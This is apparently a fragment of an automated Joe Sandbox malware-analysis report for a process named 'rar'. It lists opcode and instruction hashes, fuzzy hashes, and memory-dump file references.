                                                                                                                                                                                                                                          • Opcode ID: 26212a7374a519e65816826816287aa1d401c57b64cad0e682888ddaeac3bbf1
                                                                                                                                                                                                                                          • Instruction ID: df2978acbd48da8abb48788a03a33742d8a102495b3ede6945cffcbb358e4c55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26212a7374a519e65816826816287aa1d401c57b64cad0e682888ddaeac3bbf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE1F421A0CE8281FFA0BA2494452BEA359EF45BACF840135DE4D2B7D6DE3DE449C731
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7bb3814317599b382789f148ce2d732778e883356128849b78d26c8b7eeb0fce
                                                                                                                                                                                                                                          • Instruction ID: 4c339a5f515ea9a0174d2c4c41c8d66af67053cdf37765ba59d3b9ca991193c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb3814317599b382789f148ce2d732778e883356128849b78d26c8b7eeb0fce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21513673528BD195E700AF24A8451ED37A8F744FA8F58423ADA880B79ADF389165C731
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                          • Instruction ID: 4433c0ac8ae78da4ff9300b30e4b3edd8d9f620d32422343ffbe19d92d2a0238
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A41D121A19E4382FBE8BB109450538A691EF84B78FC44475D94D2BAD9DF3CE98C8760
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                          • Instruction ID: b1fd1909d7eeed2ff6bc02ecc118f20e30e44ae7046f75e7700b1dd441f6b7c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE04FD4F19B0A41EDE83622189307982401F96BA8ED458B9CC1E26392DC1DA05D5B20